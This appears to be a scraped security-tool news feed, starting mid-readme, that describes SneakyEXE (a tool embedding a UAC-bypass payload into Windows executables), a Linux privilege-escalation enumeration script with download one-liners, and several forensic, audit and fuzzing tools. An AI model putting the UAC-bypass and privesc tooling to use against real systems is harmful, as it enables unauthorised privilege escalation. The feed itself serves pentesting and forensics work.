- NOTE -
The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

Installation:

[ Linux ]:
$ git clone https://github.com/Zenix-Blurryface/SneakyEXE.git
$ cd SneakyEXE
$ chmod +x install.sh
$ sudo ./install.sh
[ Windows ]:
  • UNAVAILABLE
  • ( Soon will if many people demand )

Build:

  • Built on Opensuse Leap 15.0
  • Developed using Python 3.6.5
  • Developed with gcc (MinGW.org GCC-8.2.0-3) 8.2.0 for the payload compilation

[ Payload Embedding ]
  • In order to build the elevator from source, you will need gcc gcc 8.2.0 ( c11 ) and a AMD64 machine with Windows 10(7/8) 64-bit installed.
# Windows 10/7/8 (AMD64)
# Open cmd.exe / powershell.exe
>> gcc -mwindows -o <output>.exe /source/main.c

[ GUI Version ]
  • In order to build the GUI version from source, you will need Python 3.5.6 ( or higher ) with modules like Pyinstaller, Pillow and a AMD64 machine with Windows 10 (7/8) 64-bit installed.
# Assume we already had  Python preinstalled
# Open cmd.exe / powershell.exe
>> pip install pillow      # Installing Pillow
>> pip install pyinstaller # Installing Pyinstaller
>> mkdir compile           # Optional directory name
>> cd compile
>> pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py # For sysematic version ( /sys ), remove --onefile
>> cd dist
>> GUI.exe                 # The compiled executable :}

Disclaimer:

  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Release:

  • v0.9 beta

Credits:

This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me ( Zenix Blurryface )

Author:

Copyright © 2019 by Zenix Blurryface


Whonix v15 - Anonymous Operating System

July 8, 2019, 5:52 am
$
0
0

Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

After approximately one year of development, the Whonix Project is proud to announce the release of Whonix 15.
Whonix 15 is based on the Debian buster (Debian 10) distribution. This means users have access to many new software packages in concert with existing packages, such as a modern branch of GNuPG, and more.

Major Changes and New Features

ChangeLog


Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

July 8, 2019, 2:57 pm
$
0
0

First, a couple of useful oneliners ;)
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh

linux-smart-enumeration
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

What is it?
This script will show relevant information about the security of the local Linux system.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?
The idea is to get the information gradually.
First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.
If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.
If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.
You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.
Use: ./lse.sh [options]

 OPTIONS
   -c           Disable color
   -i           Non interactive mode
   -h           This help
   -l LEVEL     Output verbosity level
                  0: Show highly important results. (default)
                  1: Show interesting results.
                  2: Show all gathered information.
   -s SELECTION Comma separated list of sections or tests to run. Available
                sections:
                  usr: User related tests.
                  sud: Sudo related tests.
                  fst: File system related tests.
                  sys: System related tests.
                  sec: Security measures related tests.
                  ret: Recurren tasks (cron, timers) related tests.
                  net: Network related tests.
                  srv: Services related tests.
                  pro: Processes related tests.
                  sof: Softw   are related tests.
                  ctn: Container (docker, lxc) related tests.
                Specific tests can be used with their IDs (i.e.: usr020,sud)

Is it pretty?

Usage demo
Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample



Search

Rifiuti2 - Windows Recycle Bin Analyser

July 9, 2019, 6:07 am
$
0
0

Rifiuti2 is a for analyzing Windows Recycle Bin INFO2 file. Analysis of Windows Recycle Bin is usually carried out during Windows computer forensics. Rifiuti2 can extract file deletion time, original path and size of deleted files and whether the trashed files have been permanently removed.
For those interested in what it does, and what functionality it provides, please check out official site for more info. Latest features and changes can be found in NEWS file.

Special note for 0.7.0
  • Windows binaries will be automatically built from Appveyor and published to Github.
  • Systems supporting UTF-8 encoding is mandatory, except on Windows console (file output is also in UTF-8). This shouldn't be problematic though, as UTF-8 locale is pretty much standard for Linux and macOS these years. On Windows front, there are already many featureful text editors capable of opening UTF-8 unicode text files.
  • As a result, -8 option is obsolete and no more affects output in any way.

Usage
rifiuti2 is designed to be portable, and runs on command line environment. Depending on relevant Windows recycle bin format, there are 2 binaries to choose from (most users would want first one):
ProgramRecycle bin from OSPurpose
rifiuti-vistaVista – Win10Scans \$Recycle.bin style folder
rifiutiWin95 – XP/2003Reads INFO or INFO2 file in \RECYCLED or \RECYCLER folder

Run programs without any option for more detail. Here are some more frequently used options:
OptionPurpose
-o <FILE>Output to file
-xOutput XML instead of tab-separated fields
-l <CP>Display legacy (8.3) filenames and specify its codepage

Please consult manpage (Unix) or README.html (bundled with Windows binaries) for complete options and detailed usage description.

Examples
  • rifiuti-vista.exe -x -z -o result.xml \case\S-1-2-3\
Scan for index files under \case\S-1-2-3\, adjust all deletion time for local time zone, and write XML output to result.xml
  • rifiuti -l CP932 -t "\n" INFO2
Assume INFO2 file is generated from Japanese Windows (codepage 932), and display each field line by line, instead of separated by tab

Supported platform
It has been tested on Linux, Windows 7 and FreeBSD. Some testing on big endian platforms are done with Qemu emulator. More compatibility fix for other architectures welcome.

Download

Windows
Windows binaries are officially provided on Github release page.
Note that 0.6.1 version is the last version that can run on Windows XP and 2003; upcoming versions would require Vista or above.

Linux

FreeBSD
Official FreeBSD port is available since 8.4.

Others (Compile from source)
For OS where rifiuti2 is not readily available, it is always possible to compile from source.
rifiuti2 follows the usual autotools based procedure:
./configure && make check && make install
Please refer to wiki page for more detail.


Regipy - An OS Independent Python Library For Parsing Offline Registry Hives

July 9, 2019, 3:11 pm
$
0
0

Regipy is a python library for parsing offline registry hives. regipy has a lot of capabilities:
  • Use as a library:
    • Recurse over the registry hive, from root or a given path and get all subkeys and values
    • Read specific subkeys and values
    • Apply transaction logs on a registry hive
  • Command Line Tools
    • Dump an entire registry hive to json
    • Apply transaction logs on a registry hive
    • Compare registry hives
    • Execute plugins from a robust plugin system (i.e: amcache, shimcache, extract computer name...)

Installation
Only python 3.7 is supported:
pip install regipy
also, it is possible to install from source by cloning the repository and executing:
python setup.py install

CLI

Parse the header:
registry-parse-header ~/Documents/TestEvidence/Registry/SYSTEM
Example output:
╒════════════════════════╤══════════╕
│ signature              │ b'regf'  │
├────────────────────────┼──────────┤
│ primary_sequence_num   │ 11639    │
├────────────────────────┼──────────┤
│ secondary_sequence_num │ 11638    │
├────────────────────────┼──────────┤
│ last_modification_time │ 0        │
├────────────────────────┼──────────┤
│ major_version          │ 1        │
├────────────────────────┼──────────┤
│ minor_version          │ 5        │
├────────────────────────┼──────────┤
│ file_type              │ 0        │
├────────────────────────┼──────────┤
│ file_format            │ 1        │
├────────────────────────┼──────────┤
│ root_key_offset        │ 32       │
├────────────────────────┼──────────┤
│ hive_bins_data_size    │ 10534912 │
├────────────────────────┼──────────┤
│ clustering_factor      │ 1        │
├────────────────────────┼──────────┤
│ file_name              │ SYSTEM   │
├────────────────────────┼──────────┤
│ checksum               │ 0        │
╘════════════════════════╧══════════╛
[2019-02-09 13:46:12.111654] WARNING: regipy.cli: Hive is not clean! You should apply transaction logs
  • When parsing the header of a hive, also checksum validation and transaction validations are done

Dump entire hive to disk (this might take some time)
registry-dump ~/Documents/TestEvidence/Registry/NTUSER-CCLEANER.DAT -o /tmp/output.json
registry-dump util can also output a timeline instead of a JSON, by adding the -t flag

Run relevant plugins on Hive
registry-run-plugins ~/Documents/TestEvidence/Registry/SYSTEM -o /tmp/plugins_output.json
The hive type will be detected automatically and the relevant plugins will be executed. See the plugins section for more information

Compare registry hives
Compare registry hives of the same type and output to CSV (if -o is not specified output will be printed to screen)
registry-diff NTUSER.dat NTUSER_modified.dat -o /tmp/diff.csv
Example output:
[2019-02-11 19:49:18.824245] INFO: regipy.cli: Comparing NTUSER.DAT vs NTUSER_modified.DAT
╒══════════════╤══════════════╤════════════════════════════════════════════════════════════════════════════════╤════════════════════════════════════════════════╕
│ difference   │ first_hive   │ second_hive                                                                    │ description                                    │
╞══════════════╪══════════════╪════════════════════════════════════════════════════════════════════════════════╪════════════════════════════════════════════════╡
│ new_subkey   │              │ 2019-02-11T19:46:31.832134+00:00                                               │ \Software\Microsoft\legitimate_subkey          │
├──────────────┼──────────────┼────────────────────────────────────────────────────────────────────────────────┼────────────────────────────────────────────────┤
│ new_value    │              │ not_a_malware: c:\temp\legitimate_binary.exe @ 2019-02-11 19:45:25.516346+0:00 │ \Software\Microsoft\Windows\CurrentVersion\Run │
╘══════════════╧══════════════╧════════════════════════════════════════════════════════════════════════════════╧════════════════════════════════════════════════╛
[2019-02-11 19:49:18.825328] INFO: regipy.cli: Detected 2 differences

Recover a registry hive, using transaction logs:
registry-transaction-logs NTUSER.DAT -p ntuser.dat.log1 -s ntuser.dat.log2 -o recovered_NTUSER.dat
After recovering, compare the hives with registry-diff to see what changed

Using as a library

Initiate the registry hive object
from regipy.registry import RegistryHive
reg = RegistryHive('/Users/martinkorman/Documents/TestEvidence/Registry/Vibranium-NTUSER.DAT')

Iterate recursively over the entire hive, from root key
for entry in reg.recurse_subkeys(as_json=True):
    print(entry)

Iterate over a key and get all subkeys and their modification time:
for sk in reg.get_key('Software').iter_subkeys():
    print(sk.name, convert_wintime(sk.header.last_modified).isoformat())

Adobe 2019-02-03T22:05:32.525965
AppDataLow 2019-02-03T22:05:32.526047
McAfee 2019-02-03T22:05:32.526140
Microsoft 2019-02-03T22:05:32.526282
Netscape 2019-02-03T22:05:32.526352
ODBC 2019-02-03T22:05:32.526521
Policies 2019-02-03T22:05:32.526592

Get the values of a key:
reg.get_key('Software\Microsoft\Internet Explorer\BrowserEmulation').get_values(as_json=True)
[{'name': 'CVListTTL',
  'value': 0,
  'value_type': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'UnattendLoaded',
  'value': 0,
  'value_type': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'TLDUpdates',
  'value': 0,
  'value_type': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'CVListXMLVersionLow',
  'value': 2097211,
  'value_type': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'CVListXMLVersionHigh',
  'value': None,
  'value_type': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'CVListLastUpdateTime',
  'value': None,
  'value_type': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'IECompatVersionHigh',
  'value': None,
  'value_type': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'IECompatVersionLow',
  'value': 2097211,
  'value_t   ype': 'REG_DWORD',
  'is_corrupted': False},
 {'name': 'StaleCompatCache',
  'value': 0,
  'value_type': 'REG_DWORD',
  'is_corrupted': False}]

Use as a plugin:
from regipy.plugins.ntuser.ntuser_persistence import NTUserPersistencePlugin
NTUserPersistencePlugin(reg, as_json=True).run()

{
 'Software\\Microsoft\\Windows\\CurrentVersion\\Run': {
  'timestamp': '2019-02-03T22:10:52.655462',
  'values': [{
   'name': 'Sidebar',
   'value': '%ProgramFiles%\\Windows Sidebar\\Sidebar.exe /autoRun',
   'value_type': 'REG_EXPAND_SZ',
   'is_corrupted': False
  }]
 }
}

Run all relevant plugins for a specific hive
from regipy.plugins.utils import run_relevant_plugins
reg = RegistryHive('/Users/martinkorman/Documents/TestEvidence/Registry/SYSTEM')
run_relevant_plugins(reg, as_json=True)

{
 'routes': {},
 'computer_name': [{
  'control_set': 'ControlSet001\\Control\\ComputerName\\ComputerName',
  'computer_name': 'DESKTOP-5EG84UG',
  'timestamp': '2019-02-03T22:19:28.853219'
 }]
}



WinObjEx64 - Windows Object Explorer 64-Bit

July 10, 2019, 6:09 am
$
0
0

WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights.

System Requirements
WinObjEx64 does not require administrative privileges. However administrative privilege is required to view much of the namespace and to edit object-related security information.
WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants.
WinObjEx64 also supports running on Wine, including Wine Staging.
In order to use all program features Windows must be booted in the DEBUG mode.

Build
WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 or Visual Studio 2015 and later versions.

Instructions
  • Select Platform ToolSet first for project in solution you want to build (Project->Properties->General):
    • v120 for Visual Studio 2013;
    • v140 for Visual Studio 2015;
    • v141 for Visual Studio 2017.
  • For v140 and above set Target Platform Version (Project->Properties->General):
    • If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
    • If v141 then select 10.0.17134.0 (Note that Windows 10.0.17134 SDK must be installed).

What is new

Authors
(c) 2015 - 2019 WinObjEx64 Project
Original WinObjEx (c) 2003 - 2005 Four-F


Cloud Security Audit - A Command Line Security Audit Tool For Amazon Web Services

July 10, 2019, 3:15 pm
$
0
0

A command line security audit tool for Amazon Web Services

About
Cloud Security Audit is a command line tool that scans for vulnerabilities in your AWS Account. In easy way you will be able to identify unsecure parts of your infrastructure and prepare your AWS account for security audit.

Installation
Currently Cloud Security Audit does not support any package managers, but the work is in progress.

Building from sources
First of all you need to download Cloud Security Audit to your GO workspace:
$GOPATH $ go get github.com/Appliscale/cloud-security-audit
$GOPATH $ cd cloud-security-audit
Then build and install configuration for the application inside cloud-security-audit directory by executing:
cloud-security-audit $ make all

Usage

Initialising Session
If you're using MFA you need to tell Cloud Security Audit to authenticate you before trying to connect by using flag --mfa. Example:
$ cloud-security-audit --service s3 --mfa --mfa-duration 3600

EC2 Scan

How to use
To perform audit on all EC2 instances, type:
$ cloud-security-audit --service ec2
You can narrow the audit to a region, by using the flag -r or --region. Cloud Security Audit also supports AWS profiles - to specify profile use the flag -p or --profile.

Example output
+---------------+---------------------+--------------------------------+-----------------------------------+----------+
| AVAILABILITY  |         EC2         |            VOLUMES             |             SECURITY              |          |
|               |                     |                                |                                   | EC2 TAGS |
|     ZONE      |                     |     (NONE) - NOT ENCRYPTED     |              GROUPS               |          |
|               |                     |                                |                                   |          |
|               |                     |    (DKMS) - ENCRYPTED WITH     |    (INCOMING CIDR = 0.0.0.0/0)    |          |
|               |                     |         DEFAULT KMSKEY         |                                   |          |
|               |                     |                                |       ID : PROTOCOL : PORT        |          |
+---------------+---------------------+--------------------------------+-----------------------------------+----------+
| eu-central-1a | i-0fa345j6756nb3v23 | vol-0a81288qjd188424d[DKMS]    | sg-aaaaaaaa : tcp : 22            | App:some |
|               |                     | vol-0c2834re8dfsd8sdf[NONE]    | sg-aaaaaaaa : tcp : 22            | Key:Val  |
+---------------+---------------------+--------------------------------+-----------------------------------+----------+

How to read it
  1. First column AVAILABILITY ZONE contains information where the instance is placed
  2. Second column EC2 contains instance ID.
  3. Third column Volumes contains IDs of attached volumes(virtual disks) to given EC2. Suffixes meaning:
    • [NONE] - Volume not encrypted.
    • [DKMS] - Volume encrypted using AWS Default KMS Key. More about KMS you can find here
  4. Fourth column Security Groups contains IDs of security groups that have too open permissions. e.g. CIDR block is equal to 0.0.0.0/0(open to the whole world).
  5. Fifth column EC2 TAGS contains tags of a given EC2 instance to help you identify purpose of this instance.

Docs
You can find more information about encryption in the following documentation:
  1. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html

S3 Scan

How to use
To perform audit on all S3 buckets, type:
$ cloud-security-audit --service s3
Cloud Security Audit supports AWS profiles - to specify profile use the flag -p or --profile.

Example output
+------------------------------+---------+---------+-------------+------------+
|          BUCKET NAME         | DEFAULT | LOGGING |     ACL     |  POLICY    |
|                              |         |         |             |            |
|                              |   SSE   | ENABLED |  IS PUBLIC  | IS PUBLIC  |
|                              |         |         |             |            |
|                              |         |         |  R - READ   |  R - READ  |
|                              |         |         |             |            |
|                              |         |         |  W - WRITE  | W - WRITE  |
|                              |         |         |             |            |
|                              |         |         | D - DELETE  | D - DELETE |
+------------------------------+---------+---------+-------------+------------+
| bucket1                      | NONE    | true    | false       | false      |
+------------------------------+---------+---------+-------------+------------+
| bucket2                      | DKMS    | false   | false       | true [R]   |
+------------------------------+---------+---------+-------------+------------+
| bucket3                      | AES256  | false   | true [RWD]  | false      |
+--------------------------- --+---------+---------+-------------+------------+

How to read it
  1. First column BUCKET NAME contains names of the s3 buckets.
  2. Second column DEFAULT SSE gives you information on which default type of server side encryption was used in your S3 bucket:
  • NONE - Default SSE not enabled.
  • DKMS - Default SSE enabled, AWS KMS Key used to encrypt data.
  • AES256 - Default SSE enabled, AES256.
  1. Third column LOGGING ENABLED contains information if Server access logging was enabled for a given S3 bucket. This provides detailed records for the requests that are made to an S3 bucket. More information about Server Access Logging can be found here
  2. Fourth column ACL IS PUBLIC provides information if ACL (Access Control List) contains permissions, that make the bucket public (allow read/writes for anyone). More information about ACLs here
  3. Fifth column POLICY IS PUBLIC contains information if bucket's policy allows any action (read/write) for an anonymous user. More about bucket policies here R, W and D letters describe what type of action is available for everyone.

Docs
You can find more about securing your S3's in the following documentations:
  1. https://docs.aws.amazon.com/AmazonS3/latest/dev/serv-side-encryption.html
  2. https://docs.aws.amazon.com/AmazonS3/latest/dev/ServerLogs.html
  3. https://docs.aws.amazon.com/AmazonS3/latest/user-guide/server-access-logging.html

License
Apache License 2.0

Maintainers


Echidna - Ethereum Fuzz Testing Framework

July 11, 2019, 6:14 am
$
0
0

Echidna is a weird creature that eats bugs and is highly electrosensitive (with apologies to Jacob Stanley)
More seriously, Echidna is a Haskell library designed for fuzzing/property-based testing of EVM code. It supports relatively sophisticated grammar-based fuzzing campaigns to falsify a variety of predicates.

Features
  • Generates inputs tailored to your actual code
  • Optional coverage guidance to find deeper bugs
  • Automatic testcase minimization for quick triage
  • Seamless integration into the development workflow
  • Fast
  • Powerful API for advanced usage
  • Beautiful logo

Usage

Executing the test runner
The core Echidna functionality is an executable called echidna-test. echidna-test takes a contract and a list of invariants (properties that should always remain true) as input. For each invariant, it generates random sequences of calls to the contract and checks if the invariant holds. If it can find some way to falsify the invariant, it prints the call sequence that does so. If it can't, you have some assurance the contract is safe.

Writing invariants
Invariants are expressed as Solidity functions with names that begin with echidna_, have no arguments, and return a boolean. For example, if you have some balance variable that should never go below 20, you can write an extra function in your contract like this one:
function echidna_check_balance() { 
    return(balance >= 20); 
}
To check these invariants, run:
$ echidna-test myContract.sol
An example contract with tests can be found examples/solidity/basic/flags.sol. To run it, you should execute:
$ echidna-test examples/solidity/basic/flags.sol
Echidna should find a a call sequence that falisfies echidna_sometimesfalse and should be unable to find a falsifying input for echidna_alwaystrue.

Configuration options
Echidna's CLI can be used to choose the contract to test and load a configuration file.
$ echidna-test contract.sol TEST --config="config.yaml"
The configuration file allows users to choose EVM and test generation parameters. An example of a complete config file with the default options can be found at examples/solidity/basic/default.yaml. More detailed documentation on the configuration options is available in our wiki.

Advanced usage
Echidna exports an API to build powerful fuzzing systems, and has a multitude of configuration options. Unfortunately, these parts of the codebase change quickly and are thus poorly documented. The examples/api directory or Trail of Bits blog are excellent references, or use the references below to get in touch with us directly.

Installation
If you want to quickly test Echidna in Linux, we offer a statically linked binary release of v1.0.0.0 to download here.
Otherwise, to install the latest revision of Echidna, we recommend to use docker:
$ docker build -t echidna .
for example
$ docker run -t -v `pwd`:/src echidna echidna-test /src/examples/solidity/basic/flags.sol
If you'd prefer to build from source, use Stack. stack install should build and compile echidna-test in ~/.local/bin. You will need to link against libreadline and libsecp256k1 (built with recovery enabled), which should be installed with the package manager of your choosing. Additionally, you need to install the latest release of libff (you can take a look to this script used in our CI tests)
If you're getting errors building related to linking, try tinkering with --extra-include-dirs and --extra-lib-dirs.

Getting help
Feel free to stop by our #ethereum slack channel in Empire Hacking for help using or extending Echidna.
  • Get started by reviewing these simple Echidna invariants
  • Review the Solidity examples directory for more extensive Echidna use cases
  • Considering emailing the Echidna development team directly for more detailed questions


Viewing all 5840 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>